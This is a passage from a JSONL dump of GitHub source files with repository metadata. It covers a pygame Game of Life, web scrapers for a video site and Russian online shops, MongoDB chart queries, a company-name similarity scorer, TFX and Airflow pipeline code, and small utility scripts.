joules:\",E)\nCalculate_energy()","repo_name":"JuttSidho/ch_1-problem_set","sub_path":"einstein.py","file_name":"einstein.py","file_ext":"py","file_size_in_byte":370,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"29127388542","text":"import pygame as pygame\nimport sys\n\nfrom grid import Grid\n\n\nclass Gui:\n BLACK = (0, 0, 0)\n WHITE = (200, 200, 200)\n BLUE = (0, 0, 255)\n\n def __init__(self, height, width, time):\n self.WINDOW_HEIGHT = height * 20\n self.WINDOW_WIDTH = width * 20\n self.time = time\n pygame.init()\n self.SCREEN = pygame.display.set_mode((self.WINDOW_WIDTH, self.WINDOW_HEIGHT))\n self.CLOCK = pygame.time.Clock()\n self.SCREEN.fill(self.BLACK)\n self.main_grid = Grid(self.WINDOW_WIDTH, self.WINDOW_HEIGHT)\n\n def draw_grid(self, grid_class):\n grid = grid_class.get_grid()\n grid_global = grid_class.get_grid()\n block_size = 20\n for i in range(len(grid)):\n for j in range(len(grid[i])):\n rect = pygame.Rect(j * 20, i * 20, block_size, block_size)\n if grid[i][j] == 1:\n pygame.draw.rect(self.SCREEN, self.WHITE, rect, 0)\n else:\n pygame.draw.rect(self.SCREEN, self.BLACK, rect, 0)\n\n for x in range(0, self.WINDOW_WIDTH, block_size):\n for y in range(0, self.WINDOW_HEIGHT, block_size):\n rect = pygame.Rect(x, y, block_size, block_size)\n pygame.draw.rect(self.SCREEN, self.BLUE, rect, 1)\n for i in range(len(grid)):\n for j in range(len(grid[i])):\n state = grid[i][j]\n neighbours = self.count_neighbours(grid, i, j)\n if state == 0 and neighbours == 3:\n grid_global[i][j] = 1\n elif state == 1 and (neighbours < 2 or neighbours > 3):\n grid_global[i][j] = 0\n else:\n grid_global[i][j] = state\n grid_class.update_values(grid_global)\n pygame.time.wait(self.time)\n\n def count_neighbours(self, grid, x, y):\n sum_of_neighbours = 0\n for i in range(-1, +2):\n for j in range(-1, +2):\n col = int((x + i + int(self.WINDOW_WIDTH / 20)) % int(self.WINDOW_WIDTH / 20))\n row = int((y + j + int(self.WINDOW_HEIGHT / 20)) % int(self.WINDOW_HEIGHT / 20))\n sum_of_neighbours += grid[row][col]\n sum_of_neighbours -= grid[x][y]\n return sum_of_neighbours\n\n def run(self):\n while True:\n self.draw_grid(self.main_grid)\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n sys.exit()\n\n pygame.display.update()\n","repo_name":"DalduK/GameOfLifePygame","sub_path":"gui.py","file_name":"gui.py","file_ext":"py","file_size_in_byte":2567,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"33237340005","text":"import galleryCrawler as gC\nimport re\nimport json\n\nclass SantaEvent(gC.rssImageExtractor):\n website = \"moviespornsex.com\"\n\n def start_requests(self):\n try:\n filename = gC.sys.argv[1]\n except:\n # filename2 = \"upperbound.opml\"\n filename = \"galleryLinks.opml\"\n # filename = \"StaticLinks.opml\"\n # filename = \"Test.opml\"\n t = open(filename, \"r+\")\n urls = t.readlines()\n t.close()\n gC.random.shuffle(urls)\n for url in urls:\n sqaureP = gC.re.search(\"@\\[(.*)\\]\", url)\n if sqaureP != None:\n lb, ub = [int(x) for x in gC.re.split(\"[-,]\",sqaureP[1])]\n NewUrls = [url.replace(sqaureP[0],str(ui)) for ui in range(lb,ub)]\n [urls.append(NewUrl) for NewUrl in NewUrls]\n continue\n if self.website in url:\n yield gC.scrapy.Request(url=url.rstrip(), callback=self.parseFnc)\n\n def parseFnc(self,response):\n print(self.website)\n url = response.url.strip(\"/#\")\n reso_list = ['1080p', '720p', '480p', '320p', '240p']\n # import pdb;pdb.set_trace()\n videoUrl = response.css('source::attr(src)').extract()\n fileNames = [response.url.rstrip('/').split('/')[-1]+'.mp4']\n print(videoUrl)\n # fileNames = [re.split('[=]',x)[-1] for x in videoUrl] if fileNames == [] else fileNames\n self.downloadGalleryGeneric(response, videoUrl, fileNames, fileNames[0],True,\"gifs\" )\n \n def singleToManyImg(self,response,iurl,l=0,u=20):\n # import pdb; pdb.set_trace()\n print(iurl)\n imgUrls = [iurl.replace(\"@\",str(i)) for i in range(l,u)]\n galcode = iurl.split(\"/\")[-2]\n fileNames = [galcode+\" %s .jpg\" % str(i) for i in range(l,u)]\n self.downloadGalleryGeneric(response, imgUrls, fileNames, galCode=galcode)\n\nif __name__ == \"__main__\":\n print(SantaEvent.website)\n try:\n process = gC.CrawlerProcess({\n 'USER_AGENT': 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)'\n })\n process.crawl(SantaEvent)\n process.start()\n except Exception as e:\n with open(\"log.txt\", \"a+\") as inF:\n inF.write(str(e) + \"\\n\")\n","repo_name":"BeautyScraper/GalleryDownloader","sub_path":"moviespornsex.py","file_name":"moviespornsex.py","file_ext":"py","file_size_in_byte":2258,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"33090818400","text":"import os\nimport requests\nfrom bs4 import BeautifulSoup\n\nURL_WILDBERRIES = 'https://www.wildberries.ru/brands/polezzno'\nURL_VAMPOLEZNO = 'https://vampolezno.com/polezzno/'\nURL_FOURFRESH = 'https://4fresh.ru/catalog/food'\n\n\nHEADERS = {'user-agent' : 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) '\n 'Chrome/91.0.4472.135 YaBrowser/21.6.2.855 Yowser/2.5 Safari/537.36', 'accept' : '*/*'}\n\n# SEARCHED_ELEMENT = ('Чай матча зеленая/рассыпной', 'Чай матча голубая', 'Кисель')\n# # searched_element = SEARCHED_ELEMENT[2]\nsearched_element = 'матча'\n\nHOST_WILDBERRIES = 'https://www.wildberries.ru'\nHOST_VAMPOLEZNO = 'https://vampolezno.com'\nHOST_FOURFRESH = 'https://4fresh.ru'\n\nFILE = 'Информация о ценах.txt'\n\ndef get_html(url, params = None):\n result = requests.get(url=url, headers = HEADERS, params=params)\n return result\n\ndef get_pagination_next(html, host):\n soup = BeautifulSoup(html, 'html.parser')\n page_next = host + soup.find('a', class_='pagination-next').get('href')\n return page_next\n\ndef get_pagination_vampolezno(html):\n soup = BeautifulSoup(html, 'html.parser')\n page_cout = int(soup.find('ul', class_='menu-h').get_text()[-2])\n return page_cout\n\ndef get_pagination_fourfresh(html):\n soup = BeautifulSoup(html, 'html.parser')\n page_next = HOST_FOURFRESH + soup.find('a', class_='next').get('href')\n return page_next\n\ndef total_produkt_fourfresh(html):\n soup = BeautifulSoup(html, 'html.parser')\n total_produkt_ctr = soup.find('span', class_='showing').get_text(strip=True)\n total_produkt = int(total_produkt_ctr.split(' ')[-1])\n return total_produkt\n\n\n\ndef record_info(prise, link, shop_name, produkt):\n with open(FILE, 'a', encoding='utf8') as file:\n # shope_name = host.split('.')[1]\n file.write(shop_name + '\\n' + produkt + '\\n' + prise + '\\n' + link + '\\n' + '\\n\\n\\n')\n\ndef get_content_waldberries(html):\n print('Идет парсинг ...')\n soup = BeautifulSoup(html, 'html.parser')\n items = soup.find_all('a', class_='ref_goods_n_p j-open-full-product-card')\n for item in items:\n # print(item.find('span', class_='goods-name').get_text(strip=True))\n if searched_element in item.find('span', class_='goods-name').get_text(strip=True):\n produkt = item.find('span', class_='goods-name').get_text(strip=True)\n # print(item.find('span', class_='goods-name').get_text(strip=True))\n link = HOST_WILDBERRIES + item.get('href')\n prise = item.find('span', class_='price').get_text(strip=True)\n print(f'Товар на сайте {HOST_WILDBERRIES} найден.')\n record_info(prise=prise, link=link, shop_name='Wildberries', produkt=produkt)\n\ndef parse_waldberries():\n html = get_html(url=URL_WILDBERRIES)\n if html.status_code == 200:\n while True:\n get_content_waldberries(html=html.text)\n try:\n page_next = get_pagination_next(html=html.text, host=HOST_WILDBERRIES)\n html = get_html(url=page_next)\n except AttributeError:\n print('Все страницы проверены')\n break\n else:\n print('Страница не доступна')\n\ndef get_content_vampolezno(html):\n print('Идет парсинг ...')\n soup = BeautifulSoup(html, 'html.parser')\n items = soup.find_all('li', class_='tabs-shadow-category')\n print(len(items))\n for item in items:\n # print(item.find('h5').get_text(strip=True))\n if searched_element in item.find('h5').get_text(strip=True):\n produkt = item.find('h5').get_text(strip=True)\n link = HOST_VAMPOLEZNO + item.find('a').get('href')\n prise = item.find('div', class_='pricing radiocard prcb-single').get_text(strip=True)\n print(f'Товар на сайте {HOST_VAMPOLEZNO} найден.')\n record_info(prise=prise, link=link, shop_name='Vampolezno', produkt=produkt)\n\ndef parse_vampolezno():\n html = get_html(url=URL_VAMPOLEZNO)\n if html.status_code == 200:\n page_cout = get_pagination_vampolezno(html=html.text)\n for page in range(1, page_cout+1):\n if page == 1:\n get_content_vampolezno(html=html.text)\n continue\n html = get_html(url=URL_VAMPOLEZNO, params=f'page={page}')\n get_content_vampolezno(html=html.text)\n else:\n print('Все страницы проверены')\n else:\n print('Страница не доступна')\n\ndef get_content_fourfresh(html):\n print('Идет парсинг ...')\n soup = BeautifulSoup(html, 'html.parser')\n items = soup.find_all('article', class_='prod-card-small')\n for item in items:\n # print(item.find('a', class_='ci-list-item__name').get_text(strip=True))\n if searched_element in item.find('a', class_='ci-list-item__name').get_text(strip=True):\n produkt = item.find('a', class_='ci-list-item__name').get_text(strip=True)\n link = HOST_FOURFRESH + item.find('a').get('href')\n prise = item.find('div', class_='ci-actual-price').get_text(strip=True)\n print(f'Товар на сайте {HOST_FOURFRESH} найден.')\n print(link, prise)\n record_info(prise=prise, link=link, shop_name='4fresh', produkt=produkt)\n\ndef parse_fourfresh():\n html = get_html(url=URL_FOURFRESH)\n if html.status_code == 200:\n produkt_total = total_produkt_fourfresh(html=html.text)\n produkt_coul = 0\n while produkt_coul <= produkt_total:\n get_content_fourfresh(html=html.text)\n produkt_coul += 30\n page_next = get_pagination_fourfresh(html=html.text)\n # print(page_next)\n html = get_html(url=page_next)\n print(f'Проверено {produkt_coul} товаров.')\n else:\n print('Страница не доступна')\n\n\n# parse_waldberries()\n# parse_vampolezno()\nparse_fourfresh()\n\n# url = URL_VAMPOLEZNO\n# html = get_html(url=url, params=None)\n# get_content_next(html=html.text)\n\n# print(prise, link)\n# print(get_pagination_next(html=html.text))","repo_name":"Oshten/Parser","sub_path":"parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":6294,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"39523141109","text":"import re, logging\nfrom numbers import Number\nfrom itertools import imap\n\nimport pymongo\n\nfrom fbvoting.db.db import mongodb\nfrom fbvoting.rediscache import redis_cached\n\nlogger = logging.getLogger(__name__)\n\nsorting_order = [('rank', pymongo.DESCENDING), ('_id', pymongo.ASCENDING)]\n\n@redis_cached\ndef _get_norm(category):\n return mongodb.chartnorm.find({\"_id\": category}, limit=1)[0]['norm']\n\n\ndef _normalizator(category):\n norm = _get_norm(category)\n def _norm_rank(db_obj):\n db_obj['rank'] /= norm\n return db_obj\n return _norm_rank\n\n\ndef chart_iterator(category):\n \"\"\" Returns an iterator over documents such as {'advice': ..., 'rank': ...}\n sorted by rank. \"\"\"\n assert type(category) in (str, unicode)\n \n collection = mongodb['chart-' + category]\n db_cursor = collection.find(\n sort=sorting_order,\n fields= {'advice': 1, 'rank':1, '_id': 0}\n )\n \n return imap(_normalizator(category), db_cursor)\n\ndef get_chart_elements_higher_than(min_rank, category, exclude_ids=None):\n \"\"\" Return an iterator over doc such as {'advice':x, 'rank': y} for all\n documents with rank higher than min_rank. \"\"\"\n assert isinstance(min_rank, Number)\n assert type(category) in (str, unicode)\n assert type(exclude_ids) in (None, list, tuple)\n \n min_rank = min_rank * _get_norm(category) # un-normalizing\n \n query = {\"rank\" : {\"$gte\": min_rank}}\n if exclude_ids:\n query[\"_id\"] = {\"$nin\": exclude_ids}\n \n db_cursor = mongodb['chart-' + category].find(query,\n fields= {'advice': 1, 'rank':1, '_id': 0})\n return imap(_normalizator(category), db_cursor)\n\n\ndef get_sorted_chart_elements_lower_than(max_rank, category, exclude_ids=None):\n \"\"\" Return an iterator over doc such as {'advice':x, 'rank': y} for all\n documents with rank lower than max_rank, sorted by their rank. \"\"\"\n assert isinstance(max_rank, Number)\n assert type(category) in (str, unicode)\n assert type(exclude_ids) in (None, list, tuple)\n \n max_rank = max_rank * _get_norm(category) # un-normalizing\n \n query = {\"rank\" : {\"$lt\": max_rank}}\n if exclude_ids:\n query[\"_id\"] = {\"$nin\": exclude_ids}\n \n db_cursor = mongodb['chart-' + category].find(query, sort=sorting_order,\n fields= {'advice': 1, 'rank':1, '_id': 0})\n return imap(_normalizator(category), db_cursor)\n\ndef count(category):\n assert type(category) in (str, unicode)\n return mongodb['chart-' + category].count()\n\n\ndef find_rank(partial_dbdoc, category):\n \"\"\" Given a dbdoc like ( (\"author\": ...), (\"song\": ...) )\n find a case insensitive match in the chart, and returns\n the mongo document of that match (a dict with keys\n 'advice', 'rank', '_id'). If it does not exist in the chart, returns None. \"\"\"\n \n assert type(category) in (str, unicode)\n assert type(partial_dbdoc) is tuple\n\n query = dict([(\"advice.\"+key, re.compile(re.escape(value), re.IGNORECASE)) for (key, value) in partial_dbdoc])\n \n results = list(mongodb['chart-' + category].find(query, limit=1))\n \n if results:\n return _normalizator(category)(results[0])\n else:\n return None\n\n\n@redis_cached\ndef find_position(video_id, category):\n \"\"\" Returns the number of elements that come before\n the specified video. \"\"\"\n assert type(video_id) in (str, unicode)\n assert type(category) in (str, unicode)\n \n collection = mongodb['chart-' + category]\n \n matching_docs = list(collection.find(\n {\"advice.video\": video_id},\n sort=sorting_order,\n fields= {'rank':1, '_id': 1},\n limit=1\n ))\n \n if matching_docs:\n rank_of_video = matching_docs[0][\"rank\"]\n id_of_video = matching_docs[0][\"_id\"]\n else:\n return None\n \n n_with_more_rank = collection.find(\n {\"rank\": {\"$gt\": rank_of_video}},\n fields={'_id':1}\n ).count()\n \n n_of_ties_before = collection.find(\n {\"rank\": rank_of_video, \"_id\": {\"$lt\": id_of_video}},\n fields={'_id':1}\n ).count()\n \n return n_with_more_rank + n_of_ties_before\n \n \n\n","repo_name":"corradomonti/fbvoting","sub_path":"fbvoting/db/chart.py","file_name":"chart.py","file_ext":"py","file_size_in_byte":4270,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"38792531724","text":"\"\"\"\n숙제\n# 1. for 반복문을 이용하여 구구단 중 6단을 출력하세요.\n\n# 2. 지정한 횟수만큼 Hello를 출력합니다.\n# 문자열 곱셈이 아닌 for반복문을 이용해서 진행하세요.\n\n# 3. 내가 입력한 정수가 소수인지 아닌지 여부를 판별하세요.\n# 소수는 2이상의 양의 정수 중 약수가 2개뿐인 수입니다.\n# for반복문을 이용합니다.\n\"\"\"\n# 1. 구구단 6단\nfor i in range(1,10):\n print(\"6 x %d = %2d\"%(i,(6*i)))\nprint()\n\n# 2. 지정한 횟수 만큼 Hello 출력 \nnum = input(\"횟수 입력 >> \") # EX) 3회\nnum = int(num[:-1])\nfor i in range(num):\n print(\"Hello\", end=\" \")\nprint()\n\n\n# 3. 내가 입력한 정수가 소수인지 아닌지 여부를 판별\ncount = 0\n\ntmp = int(input(\"소수 판별할 2 이상의 정수를 입력하세요 >> \"))\nfor i in range(1,tmp+1):\n if tmp % i == 0:\n count += 1\n\nif count == 2:\n print(\"%d는 소수입니다.\"%(tmp))\nelse:\n print(\"%d는 소수가 아닙니다.\"%(tmp))","repo_name":"LeeBG/PythonStudy","sub_path":"day15/11.for반복문(숙제).py","file_name":"11.for반복문(숙제).py","file_ext":"py","file_size_in_byte":1014,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"74328927204","text":"import csv\nimport os\nfrom collections import defaultdict\nimport sys\nimport difflib\nimport string\nfrom time import time\nimport random\nimport re\nimport datetime\nimport pickle\nimport decimal\nfrom company_score_tfidf import keyword_score_map\n\nclass CompanyNameSimilarity:\n \n def preprocess(self, field):\n return field.encode('utf-8').lower().replace('\\n','').replace(\"'\",' ').replace('\\r','').replace('/',' ').\\\n replace('&',' ').replace('-',' ').replace('|','').replace(',','').replace('.',' ').replace('@',' ').replace('#',' ')\n\n def normalize_company_name(self, company_name):\n stop_list = [\"organisation\",\"org\",\"inc\", \"ltd\", \"labs\", \"lab\", \"llc\",\n \"llp\", \"corporation\", \"corp\",\"fed\",\"plc\",\"inc\", \"co\", \"svc\",\"services\",\"service\", \"company\",\n \"dept\",\"department\",\"assoc\",\"association\",\"limited\",\"incorporation\"]\n abbreviate = {\n \"cu\":\"credit union\"\n }\n return \" \".join([self.preprocess(word).strip() if self.preprocess(word) not in abbreviate else abbreviate[self.preprocess(word)] \\\n for word in company_name.split() if self.preprocess(word).strip() not in stop_list])\n \n\n def is_company_approx_contained(self, str1, str2):\n approx_contained_threshold = 0.3\n if len(str1) == 0:\n return False\n str1_set = set([x.lower().strip() for x in str1.split()])\n str2_set = set([x.lower().strip() for x in str2.split()])\n if len(list(str1_set)) == 0 or len(list(str2_set)) == 0:\n return False\n score_num = len(str1_set & str2_set)\n score_den1 = len(str1_set)\n score_den2 = len(str2_set)\n return ((float(score_num) / float(score_den1))+(float(score_num)/float(score_den2)))/2 > approx_contained_threshold\n\n \n def match_score(self, str1, str2, mode = 'reflex'):\n str1 = self.normalize_company_name(str1)\n str2 = self.normalize_company_name(str2)\n if len(str1) == 0:\n return 0\n str1_set = set([x.lower().strip() for x in str1.split()])\n str2_set = set([x.lower().strip() for x in str2.split()])\n if len(list(str1_set)) == 0 or len(list(str2_set)) == 0:\n return 0\n if not self.is_company_approx_contained(str1,str2):\n return 0\n mismatch_set1=[elem for elem in str1.split() if elem not in (str1_set & str2_set)]\n mismatch_set2=[elem for elem in str2.split() if elem not in (str1_set & str2_set)]\n partial_match_score_1 = self.compute_partial_match_score(mismatch_set1,mismatch_set2)\n partial_match_score_2 = self.compute_partial_match_score(mismatch_set2,mismatch_set1)\n score_num = len(str1_set & str2_set)\n score_den1 = len(str1_set)\n score_den2 = len(str2_set)\n if mode == 'non-reflex':\n return float(score_num + partial_match_score_1) / float(score_den1)\n if mode == 'reflex':\n return ((float(score_num + partial_match_score_1) / float(score_den1))+(float(score_num + partial_match_score_2)/float(score_den2)))/2\n\n\n def compute_partial_match_score(self, set_str1,set_str2):\n set_compute = set_str1\n set_check = set_str2\n if len(set_compute)==0:\n return 0\n score=0\n for word in set_compute:\n check_word_list=difflib.get_close_matches(word,set_check, n=1, cutoff=0.6)\n score += (-float(self.score_company_name(set([word])))) if len(check_word_list) == 0 \\\n else difflib.SequenceMatcher(None,word, check_word_list[0] ).ratio()\n if len(check_word_list) > 0:\n if check_word_list[0] in set_check: set_check.remove(check_word_list[0])\n return score\n\n def score_company_name(self,word_set):\n score = 0\n for word in list(word_set):\n if not word in keyword_score_map:\n score += 1.0\n else:\n score += float(keyword_score_map[word])\n return score ","repo_name":"asamat/compsim","sub_path":"compsim/company_name_similarity.py","file_name":"company_name_similarity.py","file_ext":"py","file_size_in_byte":4229,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"52"} +{"seq_id":"27485568473","text":"import os\n\nimport tensorflow as tf\nfrom tfx.types import channel_utils\n\nfrom tfx_x import PipelineConfiguration\nfrom tfx_x.components.configuration.converter import component\nfrom tfx_x.components.configuration.converter.executor import PIPELINE_CONFIGURATION_KEY\n\n\nclass ExportTest(tf.test.TestCase):\n\n def setUp(self):\n super(ExportTest, self).setUp()\n self.name = 'HelloWorld'\n self._output_data_dir = os.path.join(\n os.environ.get('TEST_UNDECLARED_OUTPUTS_DIR', self.get_temp_dir()),\n self._testMethodName)\n\n def testConstruct(self):\n custom_config = {'pouet': 12,\n 'blah': ['1', '2', '3'],\n 'plaff': 3.1415}\n\n self._output_configuration_dir = os.path.join(self._output_data_dir,\n 'output_examples')\n pipeline_configuration = PipelineConfiguration()\n pipeline_configuration.uri = self._output_configuration_dir\n\n this_component = component.FromCustomConfig(custom_config=custom_config,\n pipeline_configuration=channel_utils.as_channel(\n [pipeline_configuration])).with_id(u'Testing123')\n self.assertEqual(PipelineConfiguration.TYPE_NAME,\n this_component.outputs[PIPELINE_CONFIGURATION_KEY].type_name)\n artifact_collection = this_component.outputs[PIPELINE_CONFIGURATION_KEY].get()\n self.assertIsNotNone(artifact_collection)\n\n\nif __name__ == '__main__':\n tf.test.main()\n","repo_name":"ssoudan/tfx_x","sub_path":"tfx_x/components/configuration/converter/component_test.py","file_name":"component_test.py","file_ext":"py","file_size_in_byte":1524,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"43531001608","text":"import os\nimport json\nimport pendulum\n\nfrom airflow import DAG\nfrom airflow.operators.dummy import DummyOperator\nfrom airflow.operators.python import PythonOperator, BranchPythonOperator\nfrom airflow.operators.trigger_dagrun import TriggerDagRunOperator\nfrom airflow.providers.databricks.operators.databricks import DatabricksRunNowOperator, DatabricksSubmitRunOperator\nfrom datetime import datetime, timedelta\n\nfrom airflow.utils.task_group import TaskGroup\nfrom airflow.utils.trigger_rule import TriggerRule\nfrom pendulum.tz.timezone import Timezone\nfrom custom.operators import AutoReportValidationOperator, DailyUtils, BaseUtils\n\n_BASE_PATH = \"/usr/local/airflow/dags\"\ndef _get_notebook_params(**kwargs):\n \"\"\"\n A method for getting notebook params\n \"\"\"\n ti = kwargs[\"ti\"]\n\n print(\"=========================CHECK_ENV_PARAMS=========================\")\n print(f\"{kwargs['env']}\")\n\n\n file_path = os.path.join(_BASE_PATH, \"configs\", \"propfit\", f\"blacklist.json\")\n with open(file_path, \"r\", encoding=\"utf-8\") as f:\n notebook_params = json.load(f)\n\n for k, v in notebook_params.items():\n ti.xcom_push(key=k, value=v)\n\n# def _get_validation_config(**kwargs):\n# \"\"\"\n# A method for getting data validation config\n# \"\"\"\n# ti = kwargs[\"ti\"]\n# file_path = os.path.join(_BASE_PATH, \"configs\", \"databricks\", \"validation_config.json\")\n# with open(file_path, \"r\", encoding=\"utf-8\") as f:\n# validation_config = json.load(f)\n#\n# print(f\"[CHECK-VALIDATION-CONFIG]{validation_config}\")\n# ti.xcom_push(key=\"validation_config\", value=validation_config)\n#\n# # (!) changeable\n# table_names = [\n# \"fb_funble_ad_stats\",\n# ]\n#\n# print(f\"[CHECK-VALIDATION-TABLE-NAME]{table_names}\")\n# ti.xcom_push(key=\"table_names\", value=\",\".join(table_names))\n\ndefault_args = {\n 'owner': 'airflow',\n 'depends_on_past': False,\n 'email_on_failure': False,\n 'email_on_retry': False,\n 'retries': 1,\n 'retry_delay': timedelta(minutes=2)\n}\n\n################################### API ###################################\n\n\nwith DAG(f\"{os.path.basename(__file__).replace('.py', '')}\",\n start_date=datetime(2023, 5, 12, tzinfo=Timezone(\"Asia/Seoul\")),\n schedule_interval=None,\n catchup=False,\n default_args=default_args,\n render_template_as_native_obj=True,\n tags=[\"propfit\", \"blacklist\", \"domain\", \"daily\"]\n ) as dag_api:\n\n env = \"dev\"\n project = \"propfit\"\n\n start = DummyOperator(task_id=\"start\")\n end = DummyOperator(task_id=\"end\")\n\n get_notebook_params = PythonOperator(\n task_id=\"get_notebook_params\",\n python_callable=_get_notebook_params,\n op_kwargs={\"env\": env},\n trigger_rule=TriggerRule.ALL_SUCCESS,\n )\n\n with TaskGroup(group_id=\"main_tasks\") as main_tasks:\n main_tasks_start = DummyOperator(\n task_id=\"main_tasks_start\",\n trigger_rule=TriggerRule.ALL_SUCCESS\n )\n\n propfit_blacklist_api = DatabricksRunNowOperator(\n task_id=\"propfit_blacklist_api\",\n job_id=\"{{ ti.xcom_pull(task_ids='get_notebook_params', key='job_id') }}\",\n notebook_params={\n \"env\": env,\n \"start_date\": \"2023-03-01\",\n \"end_date\": \"2023-03-31\",\n \"advertiser_idx\": \"5\",\n \"under_threshold\": \"2000\",\n },\n trigger_rule=TriggerRule.ALL_SUCCESS\n )\n\n main_tasks_start >> propfit_blacklist_api\n\n ############################## (!) dag ##############################\n start >> get_notebook_params >> main_tasks >> end\n\n\n\n\n\n\n\n","repo_name":"nazzang49/ptbwa-airflow-dags","sub_path":"dags/propfit_daily_blacklist.py","file_name":"propfit_daily_blacklist.py","file_ext":"py","file_size_in_byte":3633,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"52"} +{"seq_id":"16751639950","text":"import math\nimport typing\n\nimport numpy as np # type: ignore # pylint: disable=E0401\nimport pandas as pd # type: ignore # pylint: disable=E0401\n\nfrom .pkg_types import GraphLike\n\nGPU_COUNT: int = 0\n\n\ndef get_gpu_count () -> int:\n \"\"\"\nSpecial handling for detecting GPU availability: an approach\nrecommended by the NVidia RAPIDS engineering team, since `nvml`\nbindings are difficult for Python libraries to keep updated.\n\n returns:\ncount of available GPUs, where `0` means none or disabled.\n \"\"\"\n global GPU_COUNT # pylint: disable=W0603\n\n if GPU_COUNT < 0:\n return 0\n\n try:\n import pynvml # type: ignore # pylint: disable=E0401\n pynvml.nvmlInit()\n\n GPU_COUNT = pynvml.nvmlDeviceGetCount()\n except Exception: # pylint: disable=W0703\n GPU_COUNT = -1\n\n return GPU_COUNT\n\n\nif get_gpu_count() > 0:\n try:\n import cudf # type: ignore # pylint: disable=E0401\n except Exception as gpu_e: # pylint: disable=W0703\n # turn off GPU usage\n #print(gpu_e)\n GPU_COUNT = -1\n\n\ndef calc_quantile_bins (\n num_rows: int\n ) -> np.ndarray:\n \"\"\"\nCalculate the bins to use for a quantile stripe, using [`numpy.linspace`](https://numpy.org/doc/stable/reference/generated/numpy.linspace.html)\n\n num_rows:\nnumber of rows in the target dataframe\n\n returns:\nthe calculated bins, as a [`numpy.ndarray`](https://numpy.org/doc/stable/reference/generated/numpy.ndarray.html)\n \"\"\"\n granularity = max(round(math.log(num_rows) * 4), 1)\n return np.linspace(0, 1, num=granularity, endpoint=True)\n\n\ndef stripe_column (\n values: list,\n bins: int,\n *,\n use_gpus: bool = False,\n ) -> np.ndarray:\n \"\"\"\nStripe a column in a dataframe, by interpolating quantiles into a set of discrete indexes.\n\n values:\nlist of values to stripe\n\n bins:\nquantile bins; see [`calc_quantile_bins()`](#calc_quantile_bins-function)\n\n use_gpus:\noptionally, use the NVidia GPU devices with the [RAPIDS libraries](https://rapids.ai/) if these libraries have been installed and the devices are available; defaults to `False`\n\n returns:\nthe striped column values, as a [`numpy.ndarray`](https://numpy.org/doc/stable/reference/generated/numpy.ndarray.html); uses the [RAPIDS `cuDF` library](https://docs.rapids.ai/api/cudf/stable/) if GPUs are enabled\n \"\"\"\n if use_gpus:\n s = cudf.Series(values)\n else:\n s = pd.Series(values)\n\n q = s.quantile(bins, interpolation=\"nearest\")\n\n try:\n stripe = np.digitize(values, q) - 1\n return stripe\n except ValueError as e:\n # should never happen?\n print(\"ValueError:\", str(e), values, s, q, bins)\n raise\n\n\ndef root_mean_square (\n values: list\n ) -> float:\n \"\"\"\nCalculate the [*root mean square*](https://mathworld.wolfram.com/Root-Mean-Square.html) of the values in the given list.\n\n values:\nlist of values to use in the RMS calculation\n\n returns:\nRMS metric as a float\n \"\"\"\n s = sum(map(lambda x: float(x)**2.0, values))\n n = float(len(values))\n return math.sqrt(s / n)\n\nclass Mixin:\n \"\"\"Base mixin, Provide `mypy` stubs for common methods and properties\"\"\"\n _g: typing.Optional[GraphLike]\n get_ns: typing.Callable\n add_ns: typing.Callable\n _ns: typing.Dict\n add: typing.Callable\n base_uri: typing.Optional[str]\n parse: typing.Callable\n get_context: typing.Callable\n use_gpus: bool\n serialize: typing.Callable\n build_blank_graph: typing.Callable\n graph_factory: typing.Callable\n remove: typing.Callable\n","repo_name":"DerwenAI/kglab","sub_path":"kglab/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":3557,"program_lang":"python","lang":"en","doc_type":"code","stars":520,"dataset":"github-code","pt":"52"} +{"seq_id":"71996356004","text":"# csv2json.py\n# 2023-06-01 K.OHWADA\n\nimport csv\nimport json\n\ndic = {}\n\ndic['title'] = \"List of Member states of the United Nations with National Flag\"\n\ndic['desc'] =\"The member states of the United Nationscomprise 193 sovereign states. The United Nations (UN) is the world's largest intergovernmental organization. All members have equal representation in the UN General Assembly.\"\n\ndic['reference'] = \"wikipedia: Member states of the United Nations\"\n\ndic['url_reference'] =\"https://en.wikipedia.org/wiki/Member_states_of_the_United_Nations\"\n\ncountries=[]\n\nwith open('un_members_flag.csv') as f1:\n reader = csv.reader(f1)\n for row in reader:\n d= {}\n d['country'] = row[0].strip()\n d['offical_name'] = row[1].strip()\n d['url_country'] = row[2].strip()\n d['url_flag_icon'] = row[3].strip()\n d['icon_width'] = int( row[4].strip() )\n d['icon_height'] = int( row[5].strip() )\n d['url_flag'] = row[6].strip()\n d['flag_width'] = int( row[7].strip() )\n d['flag_height'] = int( row[8].strip() )\n\n print(d)\n countries.append(d)\n\ndic['countries'] = countries\n\nwith open('un_members_flag.json', 'wt') as f2:\n json.dump(dic, f2)\n","repo_name":"ohwada/World_Countries","sub_path":"un_member_states_flag/python/csv2json.py","file_name":"csv2json.py","file_ext":"py","file_size_in_byte":1209,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"10444768348","text":"from django.db import models\n\nfrom apps.participants.models import InuitsParticipant\nfrom apps.participants.models.enums import ParticipantType, PaymentStatus\nfrom apps.participants.managers import VisumParticipantManager\n\nfrom scouts_auth.inuits.models import AuditedBaseModel\nfrom scouts_auth.inuits.models.fields import DefaultCharField\n\n\nclass VisumParticipant(AuditedBaseModel):\n objects = VisumParticipantManager()\n\n participant = models.ForeignKey(\n 